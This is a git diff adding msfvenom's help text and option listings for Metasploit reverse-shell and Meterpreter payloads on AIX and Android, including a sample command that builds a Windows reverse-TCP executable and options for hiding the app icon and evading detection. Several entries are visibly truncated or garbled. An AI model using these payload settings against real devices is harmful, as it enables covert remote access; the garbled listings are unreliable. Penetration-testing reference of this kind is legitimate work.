diff --git a/msfvenom/help.txt b/msfvenom/help.txt index e69de29..90ec08b 100644 --- a/msfvenom/help.txt +++ b/msfvenom/help.txt @@ -0,0 +1,32 @@ +MsfVenom - a Metasploit standalone payload generator. +Also a replacement for msfpayload and msfencode. +Usage: /usr/bin/msfvenom [options] +Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe -o payload.exe + +Options: + -l, --list List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all + -p, --payload Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom + --list-options List --payload 's standard, advanced and evasion options + -f, --format Output format (use --list formats to list) + -e, --encoder The encoder to use (use --list encoders to list) + --service-name The service name to use when generating a service binary + --sec-name The new section name to use when generating large Windows binaries. Default: random 4-character alpha string + --smallest Generate the smallest possible payload using all available encoders + --encrypt The type of encryption or encoding to apply to the shellcode (use --list encrypt to list) + --encrypt-key A key to be used for --encrypt + --encrypt-iv An initialization vector for --encrypt + -a, --arch The architecture to use for --payload and --encoders (use --list archs to list) + --platform The platform for --payload (use --list platforms to list) + -o, --out Save the payload to a file + -b, --bad-chars Characters to avoid example: '\x00\xff' + -n, --nopsled Prepend a nopsled of [length] size on to the payload + --pad-nops Use nopsled size specified by -n as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length) + -s, --space The maximum size of the resulting payload + --encoder-space The maximum size of the encoded payload (defaults to the -s value) + -i, --iterations The number of times to encode the payload + -c, --add-code Specify an additional win32 shellcode file to include + -x, --template Specify a custom executable file to use as a template + -k, --keep Preserve the --template behaviour and inject the payload as a new thread + -v, --var-name Specify a custom variable name to use for certain output formats + -t, --timeout The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable) + -h, --help Show this message diff --git a/msfvenom/payload_options/aix-ppc-shell_bind_tcp.txt b/msfvenom/payload_options/aix-ppc-shell_bind_tcp.txt new file mode 100644 index 0000000..fb075e5 --- /dev/null +++ b/msfvenom/payload_options/aix-ppc-shell_bind_tcp.txt @@ -0,0 +1,32 @@ + + Name: AIX Command Shell, Bind TCP Inline + Module: payload/aix/ppc/shell_bind_tcp + Platform: AIX + Arch: ppc +Needs Admin: No + Total size: 264 + Rank: Normal + +Provided by: + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AIX 6.1.4 yes IBM AIX Version +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/aix-ppc-shell_find_port.txt b/msfvenom/payload_options/aix-ppc-shell_find_port.txt new file mode 100644 index 0000000..b8abcbe --- /dev/null +++ b/msfvenom/payload_options/aix-ppc-shell_find_port.txt @@ -0,0 +1,31 @@ + + Name: AIX Command Shell, Find Port Inline + Module: payload/aix/ppc/shell_find_port + Platform: AIX + Arch: ppc +Needs Admin: No + Total size: 220 + Rank: Normal + +Provided by: + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AIX 6.1.4 yes IBM AIX Version +CPORT 64342 no The local client port + +Description: + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/aix-ppc-shell_interact.txt b/msfvenom/payload_options/aix-ppc-shell_interact.txt new file mode 100644 index 0000000..a0d0490 --- /dev/null +++ b/msfvenom/payload_options/aix-ppc-shell_interact.txt @@ -0,0 +1,30 @@ + + Name: AIX execve Shell for inetd + Module: payload/aix/ppc/shell_interact + Platform: AIX + Arch: ppc +Needs Admin: No + Total size: 56 + Rank: Normal + +Provided by: + jduck + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AIX 6.1.4 yes IBM AIX Version + +Description: + Simply execve /bin/sh (for inetd programs) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/aix-ppc-shell_reverse_tcp.txt b/msfvenom/payload_options/aix-ppc-shell_reverse_tcp.txt new file mode 100644 index 0000000..c3e641d --- /dev/null +++ b/msfvenom/payload_options/aix-ppc-shell_reverse_tcp.txt @@ -0,0 +1,39 @@ + + Name: AIX Command Shell, Reverse TCP Inline + Module: payload/aix/ppc/shell_reverse_tcp + Platform: AIX + Arch: ppc +Needs Admin: No + Total size: 204 + Rank: Normal + +Provided by: + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AIX 6.1.4 yes IBM AIX Version +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-meterpreter-reverse_http.txt b/msfvenom/payload_options/android-meterpreter-reverse_http.txt new file mode 100644 index 0000000..65e2aa3 --- /dev/null +++ b/msfvenom/payload_options/android-meterpreter-reverse_http.txt @@ -0,0 +1,74 @@ + + Name: Android Meterpreter, Android Reverse HTTP Stager + Module: payload/android/meterpreter/reverse_http + Platform: Android + Arch: dalvik +Needs Admin: N +Evasion options for payload/android/meterpreter/reverse_http: +========================= + +t.com> + OJ Reeves + anwarelmakrahy + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + +Description: + Run a meterpreter server in Android. + + Tunnel communication over HTTP + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AndroidHideAppIcon false no Hide the application icon automatically after launch + AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled + AndroidWakelock true no Acquire a wakelock before starting the payload + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-meterpreter-reverse_https.txt b/msfvenom/payload_options/android-meterpreter-reverse_https.txt new file mode 100644 index 0000000..9e759e2 --- /dev/null +++ b/msfvenom/payload_options/android-meterpreter-reverse_https.txt @@ -0,0 +1,76 @@ + + Name: Android Meterpreter, Android Reverse HTTPS Stager + Module: payload/android/meterpreter/reverse_https + Platform: Android + Arch: dalvik +Needs Admin: N +Evasion options for payload/android/meterpreter/reverse_https: +========================= + +.com> + OJ Reeves + anwarelmakrahy + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + +Description: + Run a meterpreter server in Android. + + Tunnel communication over HTTPS + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AndroidHideAppIcon false no Hide the application icon automatically after launch + AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled + AndroidWakelock true no Acquire a wakelock before starting the payload + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/android-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..cfa537e --- /dev/null +++ b/msfvenom/payload_options/android-meterpreter-reverse_tcp.txt @@ -0,0 +1,66 @@ + + Name: Android Meterpreter, Android Reverse TCP Stager + Module: payload/android/meterpreter/reverse_tcp + Platform: Android + Arch: dalvik +Needs Admin: No + Total size: 10217 + Rank: Normal + +Provided by: + mihi + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Run a meterpreter server in Android. + + Connect back stager + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AndroidHideAppIcon false no Hide the application icon automatically after launch + AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled + AndroidWakelock true no Acquire a wakelock before starting the payload + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-meterpreter_reverse_http.txt b/msfvenom/payload_options/android-meterpreter_reverse_http.txt new file mode 100644 index 0000000..8a3485e --- /dev/null +++ b/msfvenom/payload_options/android-meterpreter_reverse_http.txt @@ -0,0 +1,58 @@ + + Name: Android Meterpreter Shell, Reverse HTTP Inline + Module: payload/android/meterpreter_reverse_http + Platform: Android + Arch: dalvik +Needs Admin: No + +Evasion options for payload/android/meterpreter_reverse_http: +========================= + +g Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + +Description: + Connect back to attacker and spawn a Meterpreter shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-meterpreter_reverse_https.txt b/msfvenom/payload_options/android-meterpreter_reverse_https.txt new file mode 100644 index 0000000..3f1959b --- /dev/null +++ b/msfvenom/payload_options/android-meterpreter_reverse_https.txt @@ -0,0 +1,60 @@ + + Name: Android Meterpreter Shell, Reverse HTTPS Inline + Module: payload/android/meterpreter_reverse_https + Platform: Android + Arch: dalvik +Needs Admin: No + +Evasion options for payload/android/meterpreter_reverse_https: +========================= + + Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + +Description: + Connect back to attacker and spawn a Meterpreter shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/android-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..362ac7d --- /dev/null +++ b/msfvenom/payload_options/android-meterpreter_reverse_tcp.txt @@ -0,0 +1,54 @@ + + Name: Android Meterpreter Shell, Reverse TCP Inline + Module: payload/android/meterpreter_reverse_tcp + Platform: Android + Arch: dalvik +Needs Admin: No + Total size: 74177 + Rank: Normal + +Provided by: + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back to the attacker and spawn a Meterpreter shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-shell-reverse_http.txt b/msfvenom/payload_options/android-shell-reverse_http.txt new file mode 100644 index 0000000..f9806c1 --- /dev/null +++ b/msfvenom/payload_options/android-shell-reverse_http.txt @@ -0,0 +1,63 @@ + + Name: Command Shell, Android Reverse HTTP Stager + Module: payload/android/shell/reverse_http + Platform: Android + Arch: dalvik +Needs Admin: N +Evasion options for payload/android/shell/reverse_http: +========================= + +asploit.com> + anwarelmakrahy + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + +Description: + Spawn a piped command shell (sh). + + Tunnel communication over HTTP + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AndroidHideAppIcon false no Hide the application icon automatically after launch + AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled + AndroidWakelock true no Acquire a wakelock before starting the payload + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/android-shell-reverse_https.txt b/msfvenom/payload_options/android-shell-reverse_https.txt new file mode 100644 index 0000000..74c946e --- 